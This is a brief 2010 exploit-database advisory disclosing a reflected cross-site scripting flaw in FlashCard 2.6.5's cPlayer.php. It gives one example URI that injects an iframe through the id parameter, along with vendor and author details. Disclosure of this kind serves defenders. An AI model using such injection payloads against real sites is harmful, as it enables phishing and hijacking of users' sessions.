# Exploit Title: FlashCard XSS Vulnerability # Date: 22.04.2010 # Author: Valentin # Category: webapps/0day # Version: Only tested with 2.6.5, other versions may also be affected # Tested on: # CVE : # Code : [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] >> General Information Advisory/Exploit Title = FlashCard XSS Vulnerability Author = Valentin Hoebel Contact = valentin@xenuser.org [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] >> Product information Name = FlashCard Vendor = tufat.com Vendor Website = http://www.tufat.com/script9.htm Affected Version(s) = Only tested with 2.6.5, other versions may also be affected [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] >> #1 Vulnerability Type = XSS Example URI = flashcard/stateless/cPlayer.php?id="><iframe src=http://www.google.de> [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::] >> Additional Information Advisory/Exploit Published = 22.04.2010 [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::] |:: >> Misc |:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase! [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]